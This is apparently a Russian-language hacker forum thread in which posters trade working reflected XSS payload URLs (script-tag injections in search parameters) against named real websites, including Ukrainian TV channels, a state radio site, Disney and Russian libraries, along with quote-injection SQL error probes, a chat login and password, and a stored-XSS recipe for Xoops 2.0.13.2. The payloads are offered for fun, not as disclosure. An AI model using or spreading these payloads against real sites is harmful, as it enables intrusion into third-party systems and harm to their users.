Баги на сайтах.

_http://www.mo.com.ua/search.php?sw="><script>alert()</script>

 

Вот нашел баг Xss на сайте телеканала ИНТЕР
в Украине...

_http://www.inter.ua/ua/search/?lang='><script>alert('HakNet')</script>
----------------------------------------------------
Вот нашел баг Xss на сайте телеканала ICTV
в Украине...

_http://ictv.ua/ukr/search.php?search=1&news_search=1&news_search_words=&news_search_cond=&news_search_exact=&news_search_numrows=&search_section_id=0&search_words=%27%3E%3Cscript%3Ealert%28%27HakNet%27%29%3C%2Fscript%3E&search_cond=1&search_exact=1&search_numrows=5

 

HakNet не плохо.

Вот мой баг XSS на сайте transnavi :

_http://www.transnavi.com/search/?search_key="><script>alert()</script>

 

_http://www.context-ua.com/cgi-bin/query?text='><script>alert('HakNet')</script>

_http://your-radio.dp.ua/modules.php?name=News&file=search&query='><script>alert('HakNet')</script>

_http://nrcu.gov.ua/search.php?id_main=1&where=1&search='><script>alert('HakNet')</script>

http://parlament.org.ua - в поиску вказать '><script>alert('HakNet')</script>

 

Кароче нашел глюченой чат ...
Простите чо в етом розделе...но просто пашет прикольно XSS

link: http://www.elib.ru/cgi-bin/Chat.pl

login: lol
pass: 1988

ожно и не только ето
'><script>alert('HakNet')</script>
а и много другого...))) пашет всё..

 

Ну бедный дядюшка Disney и на его сайте есть XSS

http://search.disney.go.com/?oq='><script>alert('HakNet')</script>

 

Вот Xss на журнале НАТАЛИ в Украине
http://www.natali.ua/materials/search/%20"><script>alert()</script>

 

Бесполезно, но улыбнуло =)
http://www.blizzard.com/support/wow/?id=aww01671p'

 

_http://search.finam.ru/cgi-bin/ff.pl?query="><script>alert('dracula4ever')</script>

 

_http://www.myjane.ru/search/default.asp?searchword="><script>alert('dracula4ever')</script>

 

А че с ним должно быть????



Вот ещё несколько XSS :

_http://lib.usu.ru/search/?search%5Bquery%5D="><script>alert()</script>

_http://ncagip.ru/search?needle="><script>alert()</script>

 

_http://kungrad.com/index/search/?keywords="><script>alert()</script>

 

_http://www.uefexpo.ru/?p__search_text2="><script>alert()</script>

 

_http://www.opentech.ru/index.php?curr_node='

 

_http://www.membrana.ru/search.html?text="><script>alert()</script>

 

http://www.sapphiretech.com/rs/media/pressview.php?pid=25' производство карт радеон сапфир )

 

_http://www.uefexpo.ru/?p__search_text2="><script>alert()</script>

 

Xoops v2.0.13.2

Маленький баг в Xoops v2.0.13.2 : Активная XSS

Заходим в редактирование профиля и с помощью IE_XSS_KIT от zFailure кликаем в менюшке на
"Form Select-one2Text". Ищем поле "Comments Display Mode" и меняем то что там написано на
"><h1>XSS!. Теперь если мы пройдём по адресу

http://xex.ru/путь_к_xoops/modules/mylinks/singlelink.php?cid=3&lid=1

и нажмём на "Comments", nо при условии, что в движке включён модуль для работы с ссылками,
мы сможем лицезреть активную XSS. Почему я назвал это Маленьким багом? Потому что вместительность
переменной, куда мы вставили сплойт составляет 10 символов =).

 

_http://www.nlr.ru/udmsearch.zhtml?q="><script>alert()</script>

 

http://bluejack.ru/cgi-bin/show_user.pl?searchstr=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E